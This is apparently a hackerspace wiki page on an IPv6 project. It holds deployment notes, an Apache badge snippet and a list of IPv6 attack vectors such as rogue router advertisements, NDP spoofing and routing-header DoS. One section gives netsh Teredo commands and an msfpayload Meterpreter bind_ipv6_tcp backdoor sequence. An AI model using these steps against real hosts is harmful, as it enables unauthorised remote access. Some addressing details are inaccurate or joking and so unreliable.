Table of Contents
IPv6
~~META: status = active &relation firstimage = :project:ipv6-badge-blk-128-trans.png ~~
Goals of the Project
- IPv6 deployment
- education
- security research related to IPv6
Status and Plan
The project is currently in the planning stage.
- [DONE] our website http://brmlab.cz is accessible on IPv6
World IPv6 day (8 June 2011)
- [DONE] we participate in World IPv6 day
World IPv6 launch (6 June 2012)
6or4 checkicon guy for your website
Check your web server support SSI
- /etc/apache2/sites-enabled/000-default
SetEnvIf Server_Addr "^2001:" IPV6
wget -4 http://www.cznog.eu/images/checkicon.php -O ./images/ipv4.png wget -6 http://www.cznog.eu/images/checkicon.php -O ./images/ipv6.png
- index.html
<!--#if expr="$IPV6"--><img src="/images/ipv6.png" alt="IPv6 smile" /> <!--#else --> <img src="/images/ipv4.png" alt="IPv4 sad" /> <!--#endif -->
Topics (attack vectors)
Introduction to IPv6
- Testing Teredo (labs.ripe.net)
IPv6 Addressing Architecture
- The address notation for IPv6 is a group of 16 2-digit hexadecimal numbers, separated with a ':', global addresses are allocated by IANA (Ip Address Not Available)
- “::” stands for a string of 0 bits.
- Special addresses are ::1 for loopback
- ::FFFF:<IPv4 address> for IPv4-mapped-on-IPv6
- fe00::0/8 ip6-localnet
- ff00::0 ip6-mcastprefix
- fe80::/10 individuální lokální linkové
- broadcast → multicast
Finding IPv6 hosts
- DNS (highly dependent), server logs
- MAC address allocations (EUI-64 standard)
- DoS targets 1
- 3 site-local multicast addresses
- FF05::2 all-routers
- FF05::FB mDNSv6
- FF05::1:3 all DHCP servers
- Several link-local multicast addresses
- FF02::1 all nodes
- FF02::2 all routers
- FF02::F all UPnP
- … (RFCs
)
- Some deprecated (RFC 3879) site-local addresses but still used
- FEC0:0:0:FFFF::1 DNS server
http://www.abclinuxu.cz/clanky/architektura-ipv6-adresace-uzlu-1
IPv6 Header Fields
IPv6 Extension Headers
- unlimited size of header chain DoS aka Routing header DoS vs RFC 5095
IPv6 Privacy Extensions (RFC 3041)
- temporary address for host client application (eg. www browser)
- random 64bit ID
- can be disabled by Group POlicy Object (win) or DHCP
IPv6 Options
IPsec
- IPsec not required by IPv6
- blinds IPS, firewalls, ACLs
- network security relies more on endpoint security!
- DoS, malformed packets, spoofed and unprotected IKE messages (ICSA Labs methology)
Internet Control Message Protocol version 6 (ICMPv6)
- more relied upon
- moar types
Neighbor Discovery for IPv6
- NDP replaces ARP
- not authenticated
- static entries overwritten by dynamic ones
- SEND (SEcure Neighbor Discovery)
Multicast Listener Discovery
Mobility (RFC 3775)
- http://natisbad.org/MIPv6/ [TODO]
- IPSEC VPN over IPv6 called Microsoft Direct Access (Win 2008 server, Win8)
Address Auto-configuration
- stateles (SLAAC)
- rogue Router Advertisement (DoS, MiTM)
- fe80:: (local link) + MAC (EUI-64)
- statefull DHCPv6, RFC 3315
Dynamic Host Configuration Protocol version 6 (DHCPv6)
Application support for IPv6
IPv6 firewalls
- ipv6 default policy allowed, not inspected
- imany icmp6 types needs to be allowed too
- how to build and maintain antispam reputation databases?
- fragmentation and reassembly is done only by the end system
Transition/co-existence technologies (6to4, Teredo, ISATAP, etc.)
Security Implications of IPv6 on IPv4-only networks
- running teredo/miredo you are using public IP address
Exploiting over IPv6
- you dont want that miredo service start everytime (update-rc.d -f miredo remove).
- Faking IP address
Windows
int ipv6 install netsh int ipv6 set teredo [enterpriseclient|client] #(enterpriseclient gives you and public ip) netsh int ipv6 show teredo # we need qualified State msfpayload windows/meterpreter/bind_ipv6_tcp LPORT=1337 X > bind.exe upload bind.exe msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
IPv6 implementation (network devices testing)
Papers, books
- 39. Europen.cz, sbornik
- Cisco-Press-IPv6-Security-2009.pdf (@data)
- Cisco.Press.IPv6.for.Enterprise.Networks.Mar.2011.pdf (@data)
- Implementace_IPv6-CZNIC_academy.pdf (@data), CZ NIC akademie
Pavel Satrapa, 2011
Links
- HowTo make IPv6 prefered for teredo/miredo (related to RFC3484)
- Čím si vyzkoušet IPv6? (root.cz)
- telnet -6 towel.blinkenlights.nl (extra scenes)